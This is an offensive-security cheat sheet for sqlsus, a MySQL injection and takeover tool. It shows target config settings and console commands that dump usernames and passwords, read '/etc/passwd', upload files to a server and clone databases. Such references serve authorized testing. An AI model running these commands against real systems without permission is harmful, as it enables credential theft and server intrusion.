← All cheat sheets

SQLSUS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

sqlsus is a MySQL injection and takeover tool written in Perl. It
uses a command-line interface similar to a MySQL console to interact
with a database through SQL injection vulnerabilities.

BASIC USAGE#

sqlsus <config_file>             # Start with config file
sqlsus -g <config_file>          # Generate config template

SETUP#

# 1. Generate config template:
sqlsus -g target.conf

# 2. Edit config file with injection details:
# - Target URL
# - Injectable parameter
# - Injection type

# 3. Launch sqlsus:
sqlsus target.conf

CONFIGURATION FILE#

# Key settings in config file:

# Target URL with injection point
our $url = "http://target.com/page.php?id=1";

# Injection parameter
our $param = "id";

# Request method
our $method = "GET";

# Injection type
our $injection_type = "intband";   # UNION-based
# or
our $injection_type = "blind";     # Blind injection

# Authentication
our $cookie = "session=abc123";

INTERACTIVE COMMANDS#

# Database enumeration:
get databases                    # List all databases
get tables                       # List tables in current DB
get tables from <database>       # List tables in specific DB
get columns from <table>         # List columns in table

# Data extraction:
select <col1>,<col2> from <table>
                                 # Extract data
select * from <table> limit 10   # First 10 rows
count <table>                    # Count rows in table

# Database info:
get info                         # Database version, user, etc.
get users                        # List database users
get privileges                   # Show user privileges

# File operations:
get file "/etc/passwd"           # Read file from server
upload "local.txt" "/tmp/remote.txt"
                                 # Upload file to server

# System:
get uptime                       # Database uptime
get datadir                      # Data directory path

INJECTION TYPES#

# intband (UNION/in-band):
# - Fastest extraction method
# - Data returned directly in response

# blind (Boolean-based):
# - Slower, character-by-character
# - Works when no output visible

# timebased:
# - Uses time delays
# - Slowest but most reliable

EXAMPLES#

# Generate and edit config
sqlsus -g myattack.conf
# Edit myattack.conf with target details

# Start session
sqlsus myattack.conf

# Inside sqlsus console:
get databases
get tables from users_db
get columns from users
select username,password from users
get file "/etc/passwd"

AUTOCOMPLETION#

# sqlsus supports tab completion for:
# - Commands
# - Database names
# - Table names
# - Column names

CLONE FEATURE#

# Clone database to local SQLite:
clone <database>                 # Clone entire database locally
# Then query locally without sending requests

NOTES#

- Perl-based tool, MySQL-specific
- MySQL console-like interface
- Supports UNION and blind injection
- Clone feature for offline analysis
- Tab completion for convenience
- Config file must be customized per target
- Use for MySQL targets only (not MSSQL, Oracle, etc.)
- Pair with sqlmap for other DBMS types
- Only for authorized penetration testing